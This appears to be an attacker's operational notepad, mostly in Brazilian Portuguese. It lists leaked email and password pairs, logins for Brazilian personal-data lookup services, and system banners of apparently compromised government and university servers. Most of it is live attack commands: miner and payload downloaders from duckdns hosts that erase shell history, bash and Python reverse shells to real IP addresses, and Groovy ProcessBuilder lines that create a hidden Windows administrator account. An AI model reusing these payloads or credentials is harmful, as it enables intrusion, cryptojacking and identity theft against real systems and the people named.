#APROVADA arussoabud@bol.com.br|123mudar #w00x_checker_B3T4





177.156.124.43 USER: fvlbr SENHA: H4x1337

#Aprovada  \BB fjlalbuquerque@gmail.com  \BB fernanda05   \BB Proxy: 178.171.64.81  \BB ./KY070_53RV1C35





fjlalbuquerque-facilitator@gmail.com







AcessoTretaZ1337



http://177.54.156.171/

Frank

frank123



logins:

-------probusca------

jhaimes 

bandidoidos



soares

lacasa1

-------Credlink-------

Usuario: ATUA

Senha: L28248

https://consulta5.confirmeonline.com.br/validarLogin/confirmeOnline.xhtml











while read line; do host $line; done < l

unset HISTFILE; unset SAVEHIST; cd /var/tmp; wget http://0kx.duckdns.org:8088/b.pl; curl -O http://0kx.duckdns.org:8088/b.pl; perl b.pl; rm -rf b.pl; history -c



Linux tjms43.reverso.tjms.jus.br 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Linux vectra.fisica.ufmg.br 2.6.32-754.6.3.el6.i686 #1 SMP Tue Oct 9 16:31:45 CDT 2018 i686 i686 i386 GNU/Linux

Linux conab.gov.br 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3 (2019-02-02) x86_64 GNU/Linux

Linux morena.fisica.ufmg.br 3.10.0-862.14.4.el7.x86_64 #1 SMP Tue Sep 25 14:32:52 CDT 2018 x86_64 x86_64 x86_64 GNU/Linux



cc7319c205f330c5452b5d2e695325fa = zakrytyempire



/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/209.141.53.82/8080<&1

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://milnetbrasil.duckdns.org:8088/231841564/s.exe', 'update.exe')"

bitsadmin /transfer debjob /download /priority normal http://milnetbrasil.duckdns.org:8088/s.exe C:/Users/Public/sexe.exe

cd /var/tmp; wget http://milnetbrasil.duckdns.org:8088/ok.sh; curl -O http://milnetbrasil.duckdns.org:8088/ok.sh; bash ok.sh; rm -rf ok.sh



----------------------------------MINER DOWNLOADERS---------------------------------
cd /var/tmp; wget http://milnetbrasil.duckdns.org:8088/ok.sh; curl -O http://milnetbrasil.duckdns.org:8088/ok.sh; bash ok.sh; rm -rf ok.sh

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://milnetbrasil.duckdns.org:8088/231841564/s.exe', 'update.exe')"

------------------------------------BACKDOOR PAYLOADS-------------------------------
/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/205.185.127.36/8080<&1
bash -i >& /dev/tcp/205.185.127.36/8080 0>&1

println new ProcessBuilder('bash','-c','/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/205.185.127.36/8080<&1').redirectErrorStream(true).start().text
python -c 'import pty; pty.spawn("/bin/sh")'


println new ProcessBuilder('powershell','-c','net user haxstroke Ultr4N4tion4l$ /add').redirectErrorStream(true).start().text
println new ProcessBuilder('powershell','-c','net localgroup Administrators haxstroke /add').redirectErrorStream(true).start().text

unset HISTFILE; unset SAVEHIST; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://0kx.duckdns.org:8088/bins.sh; curl -O http://0kx.duckdns.org:8088/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 0kx.duckdns.org -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 0kx.duckdns.org; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 0kx.duckdns.org ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *

println new ProcessBuilder('bash','-c','unset HISTFILE; unset SAVEHIST; cd /tmp; wget milnetbrasil.duckdns.org:8088/231841564/mussolini.pl; curl -O milnetbrasil.duckdns.org:8088/231841564/mussolini.pl; perl mussolini.pl; rm -rf mussolini.pl; history -c').redirectErrorStream(true).start().text

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("205.185.127.36",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


unset HISTFILE; unset SAVEHIST; cd /tmp; wget milnetbrasil.duckdns.org:8088/231841564/mussolini.pl; curl -O milnetbrasil.duckdns.org:8088/231841564/mussolini.pl; perl mussolini.pl; rm -rf mussolini.pl; history -c



